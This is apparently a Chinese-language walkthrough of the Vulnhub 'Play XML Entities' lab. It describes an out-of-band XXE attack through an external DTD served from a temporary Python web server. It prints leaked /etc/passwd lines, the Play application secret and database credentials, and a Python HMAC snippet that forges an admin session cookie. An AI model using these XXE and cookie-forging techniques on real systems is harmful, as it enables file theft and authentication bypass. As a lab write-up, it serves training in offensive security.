【Vulnhub】Play XML Entities

yichen

发布于 2020-08-20 16:21:33

1.4K0

发布于 2020-08-20 16:21:33

文章被收录于专栏：陈冠男的游戏人生陈冠男的游戏人生

给了一个 iso 文件，打开就是登录的状态，可以直接 ifconfig 去看 ip 地址

访问一下 ip

python3 -m http.server 8080

python 开一个临时的服务，在提交表单的时候改成 xml（Content-Type 要改成 text/xml）

虽然服务器上没有这个东西，但是它确实去访问了

接下来就要通过编辑这个 test.dtd 来获得一些东西

再去访问的时候就能拿到 /etc/passwd 的信息

root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
play:x:100:65534:Linux User,,,:/opt/play-2.1.3/xxe/:/bin/false
mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false

可以发现，play 用户的家目录是 /opt/play-2.1.3/xxe/

把 test.dtd 改一下

然后去访问得到：

.gitignore
.settings
app
conf
logs
Aproject
public
README
RUNNING_PID
target
test

再看一下 conf

application.conf
evolutions
routes

在访问 routes 时候

解码一下

/                       controllers.Application.index()
GET     /0ecf87346b9c0b370f8d63e6e7fed4f0            controllers.Application.secret_url()
GET       /login                 controllers.Application.login
POST      /login                 controllers.Application.login
GET       /logout                controllers.Application.logout
GET     /assets/*file            controllers.Assets.at(path="/public", file)

访问一下

/0ecf87346b9c0b370f8d63e6e7fed4f0

再去访问一下 application.conf

解码

application.secret="X7G@Abg53=2p=][5F;uMNDm/QrDtVG0^iYHC3]Ov0t0E6b_amL16UynUbqS_?_eG"
application.langs="en"
db.default.driver=com.mysql.jdbc.Driver
db.default.url="mysql://pentesterlab:pentesterlab@localhost/xxe"
ebean.default="models.*"
logger.root=ERROR
logger.play=INFO
logger.application=DEBUG

然后去看一下 framework/src/play/src/main/scala/play/api/mvc/Http.scala，并没有返回给我，我就直接在靶机里面看了

通过分析源码计算出 user=admin 应该用的 cookie

import hashlib
import hmac
key="X7G@Abg53=2p=][5F;uMNDm/QrDtVG0^iYHC3]Ov0t0E6b_amL16UynUbqS_?_eG"
data="user=admin"
h=hmac.new(key,data,hashlib.sha1)
h.hexdigest()